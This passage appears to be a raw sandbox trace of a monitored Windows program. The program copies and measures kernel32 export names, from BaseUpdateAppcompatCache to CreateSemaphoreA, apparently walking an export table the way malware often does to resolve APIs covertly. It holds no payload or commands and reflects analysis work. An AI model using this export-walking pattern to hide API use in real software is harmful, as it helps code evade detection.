lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.198] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.198] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.198] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.198] lstrcpyA (in: lpString1=0x3f2c580, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.198] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.198] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.199] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.199] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.199] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.199] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.199] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.199] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.199] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.199] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.199] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.199] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.199] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.199] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.199] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.199] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.199] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.199] lstrcpyA (in: lpString1=0x3f2c580, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.199] lstrlenA (lpString="BEEP") returned 4 [0082.199] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.199] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.199] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.199] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.199] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.199] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.199] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.199] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.199] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.199] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.199] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.199] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.199] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.199] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.199] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.199] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.199] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.199] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.199] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.199] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.199] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.200] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.200] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.200] lstrlenA (lpString="CANCELIO") returned 8 [0082.200] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.200] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.200] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.200] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.200] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.200] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.200] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.200] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.200] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.200] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.200] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.200] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.200] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.200] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.200] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.200] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.200] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.200] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.200] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.200] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.200] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.200] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.200] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.200] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.200] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.200] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.200] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.200] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.200] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.200] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.200] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.200] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.200] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.200] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.201] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.201] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.201] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.201] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.201] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.201] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.201] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.201] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.201] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.201] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.201] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.201] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.201] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.201] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.201] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.201] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.201] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.201] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.201] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.201] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.201] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.201] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.201] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.201] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.201] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.201] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.201] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.201] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.201] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.201] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.201] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.201] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.201] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.201] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.201] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.201] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.201] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.202] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.202] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.202] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.202] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.202] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.202] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.202] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.202] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.202] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.202] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.202] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.202] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.202] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.202] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.202] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.202] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.202] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.202] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.202] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.202] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.202] lstrlenA (lpString="COPYFILEA") returned 9 [0082.202] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.202] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.202] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.202] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.202] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.202] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.202] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.202] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.202] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.202] lstrlenA (lpString="COPYFILEW") returned 9 [0082.202] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.202] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.202] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.202] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.202] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.202] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.202] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.203] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.203] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.203] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.203] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.203] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.203] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.203] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.203] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.203] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.203] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.203] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.203] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.203] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.203] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.203] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.203] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.203] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.203] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.203] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.203] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.203] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.203] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.203] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.203] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.203] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.203] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.203] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.203] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.203] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.203] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.203] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.203] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.203] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.203] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.203] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.203] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.204] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.204] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.204] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.204] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.204] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.204] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.204] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.204] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.204] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.204] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.204] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.204] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.204] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.204] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.204] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.204] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.204] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.204] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.204] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.204] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.204] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.204] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.204] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.204] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.204] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.204] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.204] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.204] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.204] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.204] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.204] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.204] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.204] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.204] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.204] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.204] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.204] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.205] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.205] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.205] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.205] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.205] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.205] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.205] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.205] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.205] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.205] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.205] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.205] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.205] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.205] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.205] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.205] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.205] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.205] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.205] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.205] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.205] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.205] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.205] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.205] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.205] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.205] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.205] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSemaphoreA" | out: 